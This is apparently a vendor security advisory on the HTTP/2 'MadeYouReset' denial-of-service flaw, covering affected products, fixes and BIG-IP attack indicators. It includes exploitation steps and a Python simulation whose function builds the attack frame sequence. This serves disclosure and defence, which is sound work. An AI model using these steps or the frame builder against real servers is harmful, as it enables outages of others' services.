Denial-of-Service via HTTP/2: MadeYouReset Vulnerability Bypasses Rapid Reset Mitigations


A new vulnerability dubbed “MadeYouReset” affects multiple HTTP/2 server implementations and enables large-scale Denial-of-Service (DoS) attacks. It bypasses the per-connection limit on concurrent HTTP/2 streams (SETTINGS_MAX_CONCURRENT_STREAMS), letting an attacker keep a server busy with far more in-flight requests than the limit allows and, in some implementations, drive it to an out-of-memory crash. The flaw stems from a protocol misuse involving RST_STREAM frames and is an evolution of the previously known Rapid Reset attack.

Severity Level: High

Vulnerability Details

  • ID: CVE-2025-8671 (with specific CVEs per vendor implementation)
  • Class: Denial-of-Service (DoS)
  • Affected Protocol: HTTP/2
  • Related Prior CVE: CVE-2023-44487 (Rapid Reset)
  • The root cause lies in the incorrect handling of RST_STREAM frames:
    • When a stream is reset, the HTTP/2 spec treats it as closed, so it no longer counts toward SETTINGS_MAX_CONCURRENT_STREAMS.
    • However, many server implementations keep processing the backend request that the reset stream started.
    • The attacker can therefore open a stream, have it reset, and open the next one indefinitely: the concurrency limit is never exceeded, yet the number of backend requests in flight grows without bound.
    • Unlike Rapid Reset (CVE-2023-44487), where the client sends the RST_STREAM frames, here the attacker provokes the server into sending them by violating the protocol on an open stream (malformed frames or flow-control violations). Mitigations that rate-limit client-sent resets therefore never trigger, while the orphaned backend work becomes a resource leak.
Affected products, CVE IDs, affected versions, and fixed versions or mitigations:

  • Apache Tomcat (CVE-2025-48989)
    • Affected versions: 11.0.0-M1 to 11.0.9; 10.1.0-M1 to 10.1.43; 9.0.0.M1 to 9.0.107. Older, EOL versions may also be affected.
    • Fixed versions: 11.0.10 or later; 10.1.44 or later; 9.0.108 or later.
  • F5 BIG-IP (CVE-2025-54500)
    • Affected versions: BIG-IP Next (all modules) 20.3.0; BIG-IP Next SPK 2.0.0 – 2.0.2 and 1.7.0 – 1.9.2; BIG-IP Next CNF 2.0.0 – 2.0.2 and 1.1.0 – 1.4.1; BIG-IP Next for Kubernetes 2.0.0; BIG-IP (all modules) 17.5.0 – 17.5.1, 17.1.0 – 17.1.2, 16.1.0 – 16.1.6, 15.1.0 – 15.1.10.
    • Fixed versions: for BIG-IP, the engineering hotfixes Hotfix-BIGIP-17.5.1.0.80.7-ENG.iso, Hotfix-BIGIP-17.1.2.2.0.259.12-ENG.iso and Hotfix-BIGIP-16.1.6.0.27.3-ENG.iso.
    • Mitigations: for systems and configurations that can use either HTTP or HTTP/2, F5 recommends using HTTP and disabling HTTP/2. For BIG-IP Next SPK, where possible, delete the F5SPKIngressHTTP2 Custom Resource.
  • Netty (CVE-2025-55163)
    • Affected versions: netty-codec-http2 (Maven) <= 4.2.3.Final and <= 4.1.123.Final.
    • Fixed versions: 4.2.4.Final and 4.1.124.Final.
  • Fastly (CVE-2025-8671)
    • Affected versions: releases before 25.17 of Fastly’s internal fork of H2O.
    • Fixed version: release 25.17.

Exploitation

  • Open a valid HTTP/2 stream from the client to the server (a HEADERS frame carrying a request), which the server hands to its backend immediately.
  • On that open stream, send a frame that violates the protocol (e.g., a WINDOW_UPDATE with a zero increment, or a malformed PRIORITY, DATA or HEADERS frame) so that the server itself must reset the stream.
  • The server sends RST_STREAM for the stream but continues processing the backend request.
  • Because the protocol now considers the stream closed, it frees a slot under SETTINGS_MAX_CONCURRENT_STREAMS, and the attacker repeats the cycle indefinitely on fresh stream IDs without ever reaching the limit.
  • The result is DoS via CPU overload or memory exhaustion from the accumulated backend work, with no client-sent RST_STREAM frames for Rapid Reset rate limiters to count.
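The cycle above, as an added illustration that is not code from the advisory, from any vendor, or from any affected project: a toy model of a server's per-connection stream accounting fed a constructed attack byte stream. The frame layout and the zero-increment WINDOW_UPDATE rule follow RFC 9113; HPACK and real request handling are left out because only the bookkeeping matters here. The "hardened" branch (cancelling the orphaned backend work and counting server-initiated resets against a hypothetical per-connection budget) is one illustrative policy, not the fix any listed vendor shipped; the class name, the `reset_budget` parameter and the stream counts are all assumptions made for the example.

```python
# Added example: toy HTTP/2 stream bookkeeping reproducing the MadeYouReset
# pattern. Not from the advisory or any vendor; the hardening shown is illustrative.

# Frame types, flags and error codes from RFC 9113 sections 6 and 7.
HEADERS, RST_STREAM, GOAWAY, WINDOW_UPDATE = 0x1, 0x3, 0x7, 0x8
FLAG_END_HEADERS = 0x4
PROTOCOL_ERROR, REFUSED_STREAM, ENHANCE_YOUR_CALM = 0x1, 0x7, 0xB


def encode_frame(ftype, flags, stream_id, payload=b""):
    """Serialise one frame: 24-bit length, 8-bit type, 8-bit flags, 31-bit stream id."""
    return (len(payload).to_bytes(3, "big") + bytes([ftype, flags])
            + (stream_id & 0x7FFFFFFF).to_bytes(4, "big") + payload)


def decode_frames(buf):
    """Split a byte buffer into (type, flags, stream_id, payload) tuples."""
    frames, off = [], 0
    while off + 9 <= len(buf):
        length = int.from_bytes(buf[off:off + 3], "big")
        ftype, flags = buf[off + 3], buf[off + 4]
        sid = int.from_bytes(buf[off + 5:off + 9], "big") & 0x7FFFFFFF
        frames.append((ftype, flags, sid, buf[off + 9:off + 9 + length]))
        off += 9 + length
    return frames


class ToyH2Server:
    """Per-connection stream bookkeeping for one peer (hypothetical model)."""

    def __init__(self, max_concurrent=100, hardened=False, reset_budget=50):
        self.max_concurrent = max_concurrent      # SETTINGS_MAX_CONCURRENT_STREAMS
        self.hardened = hardened
        self.reset_budget = reset_budget          # assumed cap on server-sent resets
        self.open_streams = set()                 # what the concurrency limit counts
        self.backend_jobs = set()                 # requests handed to the application
        self.peak_open = 0
        self.server_resets = 0
        self.closed = False
        self.outbound = []                        # frames queued for the client

    def _reset(self, sid, code):
        self.outbound.append(encode_frame(RST_STREAM, 0, sid, code.to_bytes(4, "big")))
        self.server_resets += 1
        # Per RFC 9113 the stream is now closed and stops counting toward
        # max_concurrent. That is correct; the bug is what is *not* done next.
        self.open_streams.discard(sid)
        if self.hardened:
            self.backend_jobs.discard(sid)        # cancel the orphaned backend work
            if self.server_resets > self.reset_budget:
                payload = sid.to_bytes(4, "big") + ENHANCE_YOUR_CALM.to_bytes(4, "big")
                self.outbound.append(encode_frame(GOAWAY, 0, 0, payload))
                self.closed = True
        # Vulnerable behaviour: backend_jobs keeps the job, bounded by nothing.

    def receive(self, buf):
        for ftype, flags, sid, payload in decode_frames(buf):
            if self.closed:
                break
            if ftype == HEADERS and flags & FLAG_END_HEADERS:
                if len(self.open_streams) >= self.max_concurrent:
                    self._reset(sid, REFUSED_STREAM)   # the limit working as intended
                    continue
                self.open_streams.add(sid)
                self.backend_jobs.add(sid)            # request dispatched immediately
                self.peak_open = max(self.peak_open, len(self.open_streams))
            elif ftype == WINDOW_UPDATE and sid in self.open_streams:
                increment = int.from_bytes(payload, "big") & 0x7FFFFFFF
                # RFC 9113 section 6.9: a zero increment on a stream is a stream error
                # of type PROTOCOL_ERROR, which the server must answer with RST_STREAM.
                if increment == 0:
                    self._reset(sid, PROTOCOL_ERROR)


def made_you_reset(n_streams):
    """Constructed attacker bytes: open a stream, make the server reset it, repeat."""
    buf = b""
    for i in range(n_streams):
        sid = 2 * i + 1                                        # client streams are odd
        buf += encode_frame(HEADERS, FLAG_END_HEADERS, sid)    # HPACK block omitted
        buf += encode_frame(WINDOW_UPDATE, 0, sid, (0).to_bytes(4, "big"))
    return buf


def run(hardened, n_streams=1000, max_concurrent=100):
    """Feed one attack connection to a server and report its bookkeeping."""
    srv = ToyH2Server(max_concurrent=max_concurrent, hardened=hardened)
    srv.receive(made_you_reset(n_streams))
    return {"peak_open": srv.peak_open, "open": len(srv.open_streams),
            "backend_jobs": len(srv.backend_jobs), "rst_sent": srv.server_resets,
            "connection_closed": srv.closed}


if __name__ == "__main__":
    print("vulnerable:", run(hardened=False))
    print("hardened:  ", run(hardened=True))
```

With the vulnerable policy, `peak_open` never rises above 1, so a limit of 100 concurrent streams is never touched, while `backend_jobs` reaches 1000 after one short byte stream; the only signal a defender has is the count of RST_STREAM frames the server sent, which is the counter the BIG-IP indicator later in this advisory keys on. With the hardened policy the backend set stays empty and the connection is torn down after the budget of 51 server-initiated resets.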

Recommendations

  1. Apply security updates provided by vendors (Apache, F5, Netty, etc.) addressing CVE-2025-8671 and related CVEs.
  2. Indicators of attack for BIG-IP systems:
    For BIG-IP systems, you can inspect the HTTP/2 profile statistics. If the number of RST_STREAM frames Sent and WINDOW_UPDATE frames Received significantly exceeds the number of other frames received from clients, this may indicate that a malicious actor is conducting this type of attack.
    If there is no impact on the CPU load of the BIG-IP system, you may not need to take remedial action; however, if a significant or troublesome increase in CPU load is observed, download and install the engineering hotfix for this issue.
    For information about how to view the HTTP/2 profile statistics using the Configuration utility, tmsh, or SNMP, refer to K000137190: Overview of HTTP/2 Statistics.

Source:

  • https://thehackernews.com/2025/08/new-http2-madeyoureset-vulnerability.html
  • https://kb.cert.org/vuls/id/767506
  • https://lists.apache.org/thread/9ydfg0xr0tchmglcprhxgwhj0hfwxlyf
  • https://my.f5.com/manage/s/article/K000152001
  • https://github.com/netty/netty/security/advisories/GHSA-prj3-ccx8-p6x4
  • https://www.fastlystatus.com/incident/377810


Ampcus Cyber